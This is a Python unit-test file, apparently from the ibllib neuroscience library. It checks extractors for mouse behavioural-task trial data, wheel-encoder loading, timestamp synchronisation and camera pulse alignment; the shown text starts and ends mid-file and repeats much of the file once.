test_get_goCueOnset_times(self):\n gcot = training_trials.GoCueTimes(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertTrue(np.all(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = training_trials.GoCueTimes(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 12)\n gcot = biased_trials.GoCueTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = biased_trials.GoCueTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 8)\n\n def test_get_included_trials_lt5(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials_ge5(self):\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, 
np.ndarray))\n\n def test_get_included_trials(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract(\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n\n def test_wheel_folders(self):\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n\n def test_load_encoder_positions(self):\n raw.load_encoder_positions(self.training_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.training_ge5['path'])\n 
raw.load_encoder_positions(self.biased_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.biased_ge5['path'])\n\n def test_load_encoder_events(self):\n raw.load_encoder_events(self.training_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_events(self.training_ge5['path'])\n raw.load_encoder_events(self.biased_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_events(self.biased_ge5['path'])\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n\n def tearDown(self):\n for f in self.main_path.rglob('_ibl_log.*.log'):\n f.unlink()\n [x.unlink() for x in self.training_lt5['path'].rglob('alf/*') if x.\n is_file()]\n [x.unlink() for x in self.biased_lt5['path'].rglob('alf/*') if x.\n is_file()]\n [x.unlink() for x in self.training_ge5['path'].rglob('alf/*') if x.\n is_file()]\n [x.unlink() for x in self.biased_ge5['path'].rglob('alf/*') if x.\n is_file()]\n [x.rmdir() for x in self.training_lt5['path'].rglob('alf/') if x.\n is_dir()]\n [x.rmdir() for x in self.biased_lt5['path'].rglob('alf/') if x.is_dir()\n ]\n [x.rmdir() for x in self.training_ge5['path'].rglob('alf/') if x.\n is_dir()]\n [x.rmdir() for x in self.biased_ge5['path'].rglob('alf/') if x.is_dir()\n ]\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def 
setUp(self) ->None:\n        self.main_path = Path(__file__).parent\n\n    def test_encoder_events_corrupt(self):\n        path = self.main_path.joinpath('data', 'wheel', 'lt5')\n        for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n            dy = raw._load_encoder_events_file_lt5(file_events)\n            self.assertTrue(dy.size > 6)\n        path = self.main_path.joinpath('data', 'wheel', 'ge5')\n        for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n            dy = raw._load_encoder_events_file_ge5(file_events)\n            self.assertTrue(dy.size > 6)\n\n    def test_encoder_positions_corrupts(self):\n        path = self.main_path.joinpath('data', 'wheel', 'ge5')\n        for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n            dy = raw._load_encoder_positions_file_ge5(file_position)\n            self.assertTrue(dy.size > 18)\n        path = self.main_path.joinpath('data', 'wheel', 'lt5')\n        for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n            dy = raw._load_encoder_positions_file_lt5(file_position)\n            self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n    save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n        'some_file.npy')\n    var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n    def _extract(self, **kwargs) ->tuple:\n        csv = pd.DataFrame([1, 2, 3])\n        ssv = pd.DataFrame([1, 2, 3])\n        tsv = pd.DataFrame([1, 2, 3])\n        npy = np.array([1, 2, 3])\n        return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n    def setUp(self) ->None:\n        self.tempdir = tempfile.TemporaryDirectory()\n        self.session_path = self.tempdir.name\n        self.mock_extractor = MockExtracor(self.session_path)\n\n    def test_saving_method(self):\n        data, paths = self.mock_extractor.extract(save=True)\n        self.assertTrue(all([x.exists() for x in paths]))\n\n    def tearDown(self):\n        self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n    def test_groom_pin_state(self):\n        fps = 60\n        t_offset = 39.4\n        ts = np.arange(0, 10, 1 / fps) + t_offset\n        ts += np.full_like(ts, 0.0001).cumsum()\n        n_pulses = 2\n        pulse_width = 0.3\n        duty = 0.5\n        gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n            'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n        gpio['polarities'][1::2] = -1\n        aud_offset = 40.0\n        audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n            'polarities']}\n        for p in range(n_pulses):\n            i = p * 2\n            rise = pulse_width * p + duty * p + 1\n            audio['times'][i] = aud_offset + rise\n            audio['times'][i + 1] = audio['times'][i] + pulse_width\n            rise += t_offset\n            gpio['indices'][i] = np.where(ts > rise)[0][0]\n            gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n        gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n        self.assertEqual(audio, audio_, \"Audio dict shouldn't be affected\")\n        np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n        40.033333, 40.05])\n        delay = 0.08\n        pulse_width = 1e-05\n        t = audio['times'][0] + delay\n        audio['times'] = np.sort(np.append(audio['times'], [t, t +\n            pulse_width, 80]))\n        audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n        audio['polarities'][1::2] = -1\n        gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n            =0.005)\n        self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n        audio['times'][4] -= 0.3\n        gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n            tolerance=0.1, min_diff=0.005)\n        self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n        self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n    def test_attribute_times(self, display=False):\n        tsa = np.linspace(0, 60, 60 * 
4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\nif __name__ == '__main__':\n unittest.main(exit=False, verbosity=2)\n", "<import token>\n\n\ndef wheelMoves_fixture(func):\n \"\"\"Decorator to save some dummy wheelMoves ALF files for extraction tests\"\"\"\n\n @functools.wraps(func)\n def wrapper(obj=None):\n attr_list = ['training_lt5', 'training_ge5', 'biased_lt5', 'biased_ge5'\n ]\n alf_paths = [(getattr(obj, p)['path'] / 'alf') for p in attr_list]\n n_trials = [getattr(obj, p)['ntrials'] for p in attr_list]\n for p, n in zip(alf_paths, n_trials):\n p.mkdir()\n np.save(str(p / '_ibl_wheelMoves.intervals.npy'), np.zeros((n, 2)))\n np.save(str(p / '_ibl_wheelMoves.peakAmplitude.npy'), np.zeros(n))\n func(obj)\n for p in alf_paths:\n shutil.rmtree(p)\n return wrapper\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n\n def test_get_feedbackType(self):\n ft = training_trials.FeedbackType(self.training_lt5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_lt5['ntrials'])\n 
self.assertFalse(ft[ft == 0].size > 0)\n ft = training_trials.FeedbackType(self.training_ge5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_lt5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_ge5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n\n def test_get_probabilityLeft(self):\n pl = training_trials.ProbabilityLeft(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = training_trials.ProbabilityLeft(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = biased_trials.ProbabilityLeft(self.biased_lt5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_lt5['path'])\n if md:\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n pl = biased_trials.ProbabilityLeft(self.biased_ge5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_ge5['path'])\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n\n def test_get_choice(self):\n choice = training_trials.Choice(session_path=self.training_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = training_trials.Choice(session_path=self.training_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_ge5['path'])\n trial_nogo = 
np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n\n def test_get_repNum(self):\n rn = training_trials.RepNum(self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rn, np.ndarray))\n for i in range(3):\n self.assertTrue(i in rn)\n rn = training_trials.RepNum(self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rn, np.ndarray))\n for i in range(4):\n self.assertTrue(i in rn)\n\n def test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n\n def test_get_stimOn_times_lt5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, 
np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_stimOnOffFreeze_times(self):\n st = training_trials.StimOnOffFreezeTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = training_trials.StimOnOffFreezeTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n\n def test_get_intervals(self):\n di = training_trials.Intervals(self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n di = training_trials.Intervals(self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n di = biased_trials.Intervals(self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n di = biased_trials.Intervals(self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n def test_get_goCueTrigger_times(self):\n data = raw.load_data(self.training_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = training_trials.GoCueTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = biased_trials.GoCueTriggerTimes(self.biased_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n\n def test_get_goCueOnset_times(self):\n gcot = training_trials.GoCueTimes(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertTrue(np.all(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = training_trials.GoCueTimes(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 12)\n gcot = biased_trials.GoCueTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = biased_trials.GoCueTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 8)\n\n def 
test_get_included_trials_lt5(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials_ge5(self):\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract(\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = 